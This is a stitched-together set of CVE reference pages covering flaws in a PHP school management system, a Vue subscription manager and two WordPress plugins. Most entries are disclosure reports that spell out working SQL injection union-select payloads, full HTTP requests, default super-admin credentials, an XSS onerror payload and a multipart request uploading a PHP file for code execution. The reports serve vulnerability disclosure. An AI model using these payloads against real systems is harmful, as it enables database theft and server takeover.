itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_teacher.php?id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_teacher.php?id=

Vulnerability location: /school/model/get\_teacher.php?id=,id

\[+\] Payload: /school/model/get\_teacher.php?id=-10%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_teacher.php?id\=\-10%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32371: bug_report/SQLi-1.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_subject.php?id=.

Permalink

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_subject.php?id=

Vulnerability location: /school/model/get\_subject.php?id=,id

\[+\] Payload: /school/model/get\_subject.php?id=-15%20union%20select%201,database()--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_subject.php?id\=\-15%20union%20select%201,database()\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32372: bug_report/SQLi-4.md at main · k0xx11/bug_report

Authenticated (editor or higher user role) Stored Cross-Site Scripting (XSS) vulnerability in Export All URLs plugin <= 4.1 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Description**

This plugin will add a page called “Export All URLs” under Tools. You can navigate there and can extract data from your site. You can export Posts:

*   IDs
*   Titles
*   URLs
*   And Categories

The data can be categorized before extraction, by their post types.

**When we need this plugin?**

*   To check all URLs of your website
*   During migration
*   During security audit
*   Need to share All URLs with SEO guy
*   301 Redirects handling using htaccess

**Customizable Features**

*   Filter by Author
*   Filter by Date Range
*   Exclude domain URL (very helpful in comparing results after migration)
*   Set post range (very beneficial in case of timeout/memory out error)
*   Generates CSV file name randomly (sensitive data protection for security reasons)
*   Set preferred CSV file name (provides more control)

**System requirements**

*   PHP version 5.4 or higher
*   WordPress version 3.1.0 or higher

If you found any bug then report me, I’ll try to fix it as soon as possible!

**Contact**

For further information please send me an email.

**Screenshots**

**Installation****From your WordPress dashboard**

1.  Visit ‘Plugins > Add New’
2.  Search for ‘Export All URLs’
3.  Activate Export All URLs from your Plugins page.

**From WordPress.org**

1.  Download Export All URLs.
2.  Unzip plugin.
3.  Upload the ‘Export All URLs’ directory to your ‘/wp-content/plugins/’ directory, using your favorite method (ftp, sftp, scp, etc…)
4.  Activate Export All URLs from your Plugins page.

**Usage**

1.  Go to Tools > Export All URLs to export URLs of your website.
2.  Select Post Type
3.  Choose Data (e.g Post ID, Title, URLs, Categories)
4.  Apply Filters (e.g Post Status, Author, Post Range)
5.  Configure advance options (e.g exclude domain url, number of posts)
6.  Finally Select Export type and click on Export Now.

**Uninstalling:**

1.  In the Admin Panel, go to “Plugins” and deactivate the plugin.
2.  Go to the “plugins” folder of your WordPress directory and delete the files/folder for this plugin.

**FAQ**

**About Plugin Support?**

Post your question on support forum and we will try to answer your question as quick as possible.

**Why did you make this plugin?**

We couldn’t find a plugin that would export all URLs, titles and categories in a simplest possible way. So, we decided to take step further to fill this gap.

**Why the file name is randomly generated?**

Exporting the file with static name can be easily found by malicious attacker, and may result in sensitive information leakage. So we decided to generate random name, which is harder to guess. However plugin provides complete control over file name.

**Can I delete generated CSV file?**

Yes, absolutely. It is highly recommended, once the file is generated, there is a direct link to delete the generated file.

**Does Export All URLs make changes to the database?**

No. It has no settings/configurations to store so it does not touch the database.

**How can I check out if the plugin works for me?**

Install and activate. Go to Tools / Export All URLs. Select all options and download CSV file.

**Which PHP version do I need?**

This plugin has been tested and works with PHP versions 5.4 and greater. WordPress itself recommends using PHP version 7.3 or greater. If you’re using a PHP version lower than 5.4 please upgrade your PHP version or contact your Server administrator.

**Are there any known incompatibilities?**

Nope, there were some issues in past, but they were fixed in version 4.0.

**Are there any server requirements?**

Yes. The plugin requires a PHP version 5.4 or higher and WordPress version 3.1.0 or higher.

**Reviews**

This plugin is seriously awesome. When I rebuild a site from scratch I use this to export URLs from the old site and the new site to make sure all URLs match up or create URL redirection rules which I later import in the Redirection plugin.

Does not export pages/posts... it says "Invalid token" or something alongst those lines all the way at the bottom, it just refreshes the page.

Very Easy to Use, and it just works!

Support is also great for this plugin! I wish all of the developers could provide this type of service. Definitely using on our other websites. Thank you Atlas!

Brilliant! 3 clicks -- and problem solved 🙂

Read all 56 reviews

**Contributors & Developers**

“Export All URLs” is open source software. The following people have contributed to this plugin.

Contributors

*    Atlas\_Gondal

**Changelog****4.3**

*   Added – overall security and stability improvements
*   Compatibility – tested with wordpress 5.9.2

**4.2**

*   Fixed – patched a security vulnerability
*   Removed – file path customization option
*   Compatibility – tested with wordpress 5.9.1 & PHP 8.1

**4.1**

*   Added – option to remove woo commerce extra attributes from categories
*   Tweak – bit of formatting adjustments
*   Added – some default settings
*   Compatibility – tested with wordpress 5.4.2

**4.0**

*   Added – export post IDs
*   Added – exclude domain URL
*   Added – complete support of custom post type categories
*   Tweak – small dashboard design improvements
*   Added – enables user to delete the file once downloaded
*   Compatibility – wordpress 5.4 and php 7.3
*   Tweak – migrated under tools options, instead of settings
*   Added – displays total number of links
*   Added – new easy ways to report problem or bug
*   Fixed – conflict with “Security Header” & “Elementor” plugin
*   Fixed – typo on settings page
*   Added – extra verification checks

**3.6**

*   Added – filter data by date range
*   Tweak – some general activation improvements
*   Compatibility – tested with 5.1.1

**3.5**

*   Added – allow users to customize file path and file name
*   Fixed – grammatical mistake
*   Compatibility – tested with 4.9.7

**3.0**

*   Added – filter data by author
*   Added – specify post range for extraction
*   Added – generates random file name
*   Compatibility – tested with 4.9.2

**2.6**

*   Fixed – variable initialization errors
*   Compatibility – tested with 4.9

**2.5**

*   Added – support for selecting post status
*   Compatibility – tested with 4.7.5

**2.4**

*   Fixed – fatal error bug fixed
*   Compatibility – tested with wordpress 4.7.2

**2.3**

*   Fixed – categories export, (only first category was exporting)
*   Compatibility – tested with wordpress 4.7

**2.2**

*   Added – support for wordpress 4.6.1

**2.1**

*   Fixed – special character exporting for Polish Language

**2.0**

*   Added – support for exporting title and categories

**1.0**

*   initial release

CVE-2022-29452: Export All URLs

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_subject_routing.php?id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_subject\_routing.php?id=

Vulnerability location: /school/model/get\_subject\_routing.php?id=,id

\[+\] Payload: /school/model/get\_subject\_routing.php?id=-23%20union%20select%201,2,database(),4,5--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_subject\_routing.php?id\=\-23%20union%20select%201,2,database(),4,5\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32374: bug_report/SQLi-5.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_grade.php?id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_grade.php?id=

Vulnerability location: /school/model/get\_grade.php?id=,id

\[+\] Payload: /school/model/get\_grade.php?id=-13%20union%20select%201,database(),3,4--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_grade.php?id\=\-13%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32368: bug_report/SQLi-3.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_exam.php?id=.

Permalink

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_exam.php?id=

Vulnerability location: /school/model/get\_exam.php?id=,id

\[+\] Payload: /school/model/get\_exam.php?id=-1%20union%20select%201,database()--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_exam.php?id\=\-1%20union%20select%201,database()\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32373: bug_report/SQLi-7.md at main · k0xx11/bug_report

Subscription-Manager v1.0 /main.js has a cross-site scripting (XSS) vulnerability in the machineDetail parameter.

**Vulnerability file:**

/main.js

let machine\_edit\_component \= Vue.component('Machine\_edit\_component',{
    template:\`
        <div class="container">
            <div id="machine-edit">
                <h2>✍ 正在编辑-{{machineDetail.name}} <span @click="goBack">🔙 返回</span><span @click="goDelete">🗑️ 删除</span></h2>
                <br/>
                <h3>基本信息</h3>
                <br/>
                <div class="form-input-material">
                    <input
                        class="form-control-material"
                        type="text"
                        name="name"
                        id="name"
                        placeholder=" "
                        autocomplete="off"
                        v-model="machineDetail.name"
                    />
                    <label for="name">小鸡名</label>
                </div>    
                <br/><br/>
                <div class="form-input-material">    
                    <input
                        class="form-control-material"
                        type="text"
                        name="fee"
                        id="fee"
                        placeholder=" "
                        autocomplete="off"
                        v-model="machineDetail.fee"
                    />
                    <label for="fee">每月费用</label>
                </div>  
                <br/><br/>  
                <div class="form-input-material">      
                    <input
                        class="form-control-material"
                        type="text"
                        name="host"
                        id="host"
                        placeholder=" "
                        autocomplete="off"
                        v-model="machineDetail.HOST"
                    />
                    <label for="host">主机商</label>
                </div>   
                <br/><br/> 
                <div class="form-input-material">      
                    <input
                        class="form-control-material"
                        type="text"
                        name="location"
                        id="location"
                        placeholder=" "
                        autocomplete="off"
                        v-model="machineDetail.location"
                    />
                    <label for="location">位置</label>
                </div>    
                <br/><br/>
                <div class="form-input-material">       
                    <input
                        class="form-control-material"
                        type="text"
                        name="ip"
                        id="ip"
                        placeholder=" "
                        autocomplete="off"
                        v-model="machineDetail.ip"
                    />
                    <label for="ip">IP</label>
                </div>    
                <br/><br/>
                <div class="form-input-material">       
                    <input
                        class="form-control-material"
                        type="text"
                        name="panel"
                        id="panel"
                        placeholder=" "
                        autocomplete="off"
                        v-model="machineDetail.panel"
                    />
                    <label for="panel">面板地址</label>
                </div>    
                <br/>
                <br/>
                <div class="form-input-material">       
                    <input
                        class="form-control-material"
                        type="text"
                        name="deadline"
                        id="deadline"
                        placeholder=" "
                        autocomplete="off"
                        v-model="machineDetail.deadline"
                    />
                    <label for="deadline">过期日期(yyyy-mm-dd)</label>
                </div> 
                <br/>
                <br/>
                <div class="form-input-material">       
                    <input
                        class="form-control-material"
                        type="text"
                        name="cycle"
                        id="cycle"
                        placeholder=" "
                        autocomplete="off"
                        v-model="machineDetail.cycle"
                    />
                    <label for="cycle">付款周期(天)</label>
                </div>
                <br/>
                <h3>自动续费开关</h3>
                    <div class="form-check">
                        <input type="radio" class="form-check-input bounce" id="auto-true" value="1" v-model="machineDetail.auto"/>
                        <label class="form-check-label" for="auto">自动续费</label>
                    </div>
                    <div class="form-check">
                        <input type="radio" class="form-check-input bounce" id="auto-false" value="0" v-model="machineDetail.auto"/>
                        <label class="form-check-label" for="auto">算了</label>
                    </div>
                <h3>加入收藏</h3>
                    <div class="form-check">
                        <input type="radio"  class="form-check-input bounce" value="1" v-model="machineDetail.liked"/>
                        <label class="form-check-label" for="liked">这必须收藏</label>
                    </div>
                    <div class="form-check">
                        <input type="radio" class="form-check-input bounce" value="0" v-model="machineDetail.liked"/>
                        <label class="form-check-label" for="liked">算了</label>
                    </div>
                    <br/>
                    <h3>备注</h3>
                    <textarea name="info" id="" cols="30" rows="10" v-model="machineDetail.info"></textarea>
                    <br><br>
                <button class="btn btn-primary" @click="update">保存</button>
                </div>
            </div>
        </div>
    \`,
    data:function (){
        return {
            machineDetail : \[\],
            logged: false
        }
    },
    methods:{
        getDetail: function(){
            let url \= window.location.href.replace(window.location.hash,'');
            axios.get(url + 'X/index.php?action=getMachineDetail&id=' + this.$route.params.id)
                .then((response)\=>{
                    this.machineDetail \= response.data\[0\]
               })
        },
        goBack: function(){
            this.$router.go(\-1)
        },
        goDelete: function(){
            this.$router.push({path:'/machine/'+this.$route.params.id+'/delete'})
        },
        update: function(){
            if(this.machineDetail\['name'\] !== '' && this.machineDetail\['liked'\] !== '' && this.machineDetail\['deadline'\] !== '' && this.machineDetail\['location'\] !== '' && this.machineDetail\['fee'\] !== '' && this.machineDetail\['cycle'\] !== '' && this.machineDetail\['auto'\] !== '' && this.machineDetail\['panel'\] !== ''  && this.machineDetail\['info'\] !== '' && this.machineDetail\['HOST'\] !== '' && this.machineDetail\['ip'\] !== ''){
                let url \= window.location.href.replace(window.location.hash,'');
                axios.get(url + 'X/index.php?action=updateMachineDetail&id='+this.$route.params.id + '&name='+this.machineDetail\['name'\]+'&liked='+this.machineDetail\['liked'\]+'&deadline='+this.machineDetail\['deadline'\]+'&location='+this.machineDetail\['location'\]+'&fee='+this.machineDetail\['fee'\]+'&cycle='+this.machineDetail\['cycle'\]+'&auto='+this.machineDetail\['auto'\]+'&panel='+this.machineDetail\['panel'\]+'&info='+this.machineDetail\['info'\]+'&HOST='+this.machineDetail\['HOST'\]+'&ip='+this.machineDetail\['ip'\])
                    .then((response)\=>{
                        if(response.data \=== 1){
                            alert("编辑成功")
                            this.$router.go(\-1)
                        }
                    })
            }else{
                alert('有什么东西没填完？');
            }
        }
    },
    mounted(){
        this.logged \= Cookies.get('UserStatus')
        if (this.logged !== 'true') {
            this.$router.push({path: '/u'})
        }
        this.getDetail();
    }
})

In the main.js file, the machineDetail parameter and the machineDetail parameter under the machineDetail.info method are controllable, and the machineDetail parameter is not strictly filtered, causing XSS injection vulnerabilities!

POC

    /X/index.php?action=updateMachineDetail&id=1&name=测试机&liked=1&deadline=2020-12-10&location=深圳&fee=10&cycle=30&auto=0&panel=baidu.com&info=<img src="x" onerror="alert(1);">&HOST=阿里云&ip=1.1.1.1

CVE-2021-41415: Subscription-Manager v1.0 /main.js hava a XSS Vulnerability · Issue #2 · youranreus/Subscription-Manager

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Admin Management Xtended plugin <= 2.4.4 at WordPress.



Expand Up @@ -8,7 +8,7 @@ \*/  
/\* \* Copyright 2008-2020 Oliver Schlöbe (email : scripts@schloebe.de) \* Copyright 2008-2022 Oliver Schlöbe (email : scripts@schloebe.de) \* \* This program is free software; you can redistribute it and/or modify \* it under the terms of the GNU General Public License as published by Expand Down Expand Up @@ -71,6 +71,8 @@ function return\_function($output) { \*/ function ame\_ajax\_save\_mediadesc() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['postid'\] ); $new\_mediadesc = $\_POST\['new\_mediadesc'\];  
Expand All @@ -96,6 +98,8 @@ function ame\_ajax\_save\_mediadesc() { \*/ function ame\_ajax\_set\_commentstatus() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['postid'\] ); $q\_status = intval( $\_POST\['comment\_status'\] );  
Expand Down Expand Up @@ -127,6 +131,7 @@ function ame\_ajax\_set\_commentstatus() { \*/ function ame\_get\_pageorder() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
if( !current\_user\_can( 'edit\_pages' ) ) { die(); Expand Down Expand Up @@ -155,6 +160,8 @@ function ame\_get\_pageorder() { \*/ function ame\_ajax\_save\_tags() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['postid'\] ); $ame\_tags = $\_POST\['new\_tags'\];  
Expand Down Expand Up @@ -200,6 +207,8 @@ function ame\_ajax\_save\_tags() { \*/ function ame\_ajax\_get\_categories() { global $wpdb, $post; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$ame\_id = intval( $\_POST\['postid'\] );  
if( !current\_user\_can( 'edit\_post', $ame\_id ) ) { Expand Down Expand Up @@ -232,6 +241,8 @@ function ame\_ajax\_get\_categories() { \*/ function ame\_ajax\_save\_categories() { global $wpdb, $post; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['postid'\] ); $ame\_cats = $\_POST\['ame\_cats'\];  
Expand Down Expand Up @@ -272,6 +283,8 @@ function ame\_ajax\_save\_categories() { \*/ function ame\_toggle\_showinvisposts() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$status = intval( $\_POST\['status'\] );  
update\_option( "ame\_toggle\_showinvisposts", $status ); Expand Down Expand Up @@ -300,6 +313,8 @@ function ame\_ajax\_toggle\_imageset() { \*/ function ame\_toggle\_orderoptions() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$status = intval( $\_POST\['status'\] );  
update\_option( "ame\_show\_orderoptions", $status ); Expand All @@ -314,6 +329,8 @@ function ame\_toggle\_orderoptions() { \*/ function ame\_slug\_edit() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] ); if( is\_string( $\_POST\['posttype'\] ) ) $posttype = $\_POST\['posttype'\];  
Expand Down Expand Up @@ -342,6 +359,8 @@ function ame\_slug\_edit() { \*/ function ame\_author\_edit() { global $wpdb, $current\_user; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['post\_id'\] );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -396,6 +415,8 @@ function ame\_author\_edit() { \*/ function ame\_save\_order() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] ); $neworderid = intval( $\_POST\['new\_orderid'\] );  
Expand All @@ -416,6 +437,8 @@ function ame\_save\_order() { \*/ function ame\_save\_slug() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -451,6 +474,8 @@ function ame\_save\_slug() { \*/ function ame\_save\_author() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -480,6 +505,8 @@ function ame\_save\_author() { \*/ function ame\_save\_title() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] ); $new\_title = $\_POST\['new\_title'\]; $new\_title = apply\_filters( 'the\_title', $new\_title ); Expand All @@ -504,6 +531,8 @@ function ame\_save\_title() { \*/ function ame\_set\_date() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( substr( $\_POST\['category\_id'\], 10, 5 ) );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -542,6 +571,8 @@ function ame\_set\_date() { \*/ function ame\_toggle\_visibility() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -584,6 +615,8 @@ function ame\_toggle\_visibility() { \*/ function ame\_toggle\_sticky() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['post\_id'\] );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -612,6 +645,8 @@ function ame\_toggle\_sticky() { \* @link http://plugins.trac.wordpress.org/browser/exclude-pages/trunk/exclude\_pages.php#L162 \*/ function ame\_toggle\_excludestatus() { check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
if( !current\_user\_can( 'edit\_pages' ) ) { die(); return; Expand Down Expand Up @@ -955,9 +990,20 @@ function ame\_enqueue\_stuff\_edit() { wp\_enqueue\_script( 'ame\_gui-modificators', AME\_PLUGINFULLURL . "js/gui-modificators.js", array( 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'sack' ), AME\_VERSION ); wp\_register\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'jquery', 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts' ); wp\_localize\_script( 'ame\_miscscripts', 'ameAjaxSec', array( 'ajaxnonce' => wp\_create\_nonce( 'ame\_ajax\_validation' ) ) ); }  
add\_action( 'admin\_head', 'ame\_css\_admin\_header' ); Expand Down Expand Up @@ -1000,9 +1046,20 @@ function ame\_enqueue\_stuff\_linkmanager() { wp\_enqueue\_script( 'ame\_gui-modificators', AME\_PLUGINFULLURL . "js/gui-modificators.js", array( 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'sack' ), AME\_VERSION ); wp\_register\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'jquery', 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts' ); wp\_localize\_script( 'ame\_miscscripts', 'ameAjaxSec', array( 'ajaxnonce' => wp\_create\_nonce( 'ame\_ajax\_validation' ) ) ); }  
add\_action( 'admin\_print\_scripts', 'ame\_js\_admin\_header' ); Expand All @@ -1015,9 +1072,20 @@ function ame\_enqueue\_stuff\_upload() { wp\_enqueue\_script( 'ame\_gui-modificators', AME\_PLUGINFULLURL . "js/gui-modificators.js", array( 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'sack' ), AME\_VERSION ); wp\_register\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'jquery', 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts' ); wp\_localize\_script( 'ame\_miscscripts', 'ameAjaxSec', array( 'ajaxnonce' => wp\_create\_nonce( 'ame\_ajax\_validation' ) ) ); }  
add\_action( 'admin\_print\_scripts', 'ame\_js\_admin\_header' ); Expand Down

CVE-2022-29450: 2.4.5 Release · oliverschloebe/admin-management-xtended@f94732d

itsourcecode Advanced School Management System v1.0 is vulnerable to Arbitrary code execution via ip/school/view/all_teacher.php.

Permalink

Cannot retrieve contributors at this time

**Advanced School Management System v1.0 by itsourcecode.com has arbitrary code execution (RCE)**

**Vul\_Author**: **Zhijie Tan**

vendor: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability url: ip/school/view/all\_teacher.php(RCE vulnerability exists in "edit" function of Ip/School/view/all\_teacher.php)

Loophole location：There is an arbitrary file upload vulnerability (RCE) in the "edit" function file picture upload point of the TEACHER module in the background management system. You can change the "php" suffix of "shell.php" to "png" to bypass the front-end detection, and then modify the "png" back to the original "php" by grabbing the Burp package. The "shell.php" file can be uploaded successfully after putting back the request packet.

Super Admin account password: suarez081119@gmail.com/12345

Request package for file upload：

POST /school/index.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/school/view/all\_teacher.php
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------12765172874523
Content-Length: 1148
\-----------------------------12765172874523
Content-Disposition: form-data; name="full\_name"
Teacher 6
\-----------------------------12765172874523
Content-Disposition: form-data; name="i\_name"
Teacher 6
\-----------------------------12765172874523
Content-Disposition: form-data; name="address"
School
\-----------------------------12765172874523
Content-Disposition: form-data; name="gender"
Male
\-----------------------------12765172874523
Content-Disposition: form-data; name="phone"
666-666-6666
\-----------------------------12765172874523
Content-Disposition: form-data; name="email"
t6@gmail.com
\-----------------------------12765172874523
Content-Disposition: form-data; name="fileToUpload"; filename="shell.php"
Content-Type: image/jpeg
JFJF
<?php phpinfo();?>
\-----------------------------12765172874523
Content-Disposition: form-data; name="c\_page"
1
\-----------------------------12765172874523
Content-Disposition: form-data; name="id"
15
\-----------------------------12765172874523
Content-Disposition: form-data; name="do"
update\_teacher
\-----------------------------12765172874523--

The files will be uploaded to this directory \\school\\uploads  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-32433: bug_report/RCE-1.md at main · tamchikit/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_admin_profile.php?my_index=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_admin\_profile.php?my\_index=

Vulnerability location: /school/model/get\_admin\_profile.php?my\_index=,my\_index

\[+\] Payload: /school/model/get\_admin\_profile.php?my\_index=-1'%20union%20select%201,2,database(),4,5,6,7,8,9,10--+ // Leak place ---> my\_index

Current database name: std\_db,length is 6

GET /school/model/get\_admin\_profile.php?my\_index\=\-1'%20union%20select%201,2,database(),4,5,6,7,8,9,10--+ HTTP/1.1
Host: 192.168.1.19
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

Tag

#php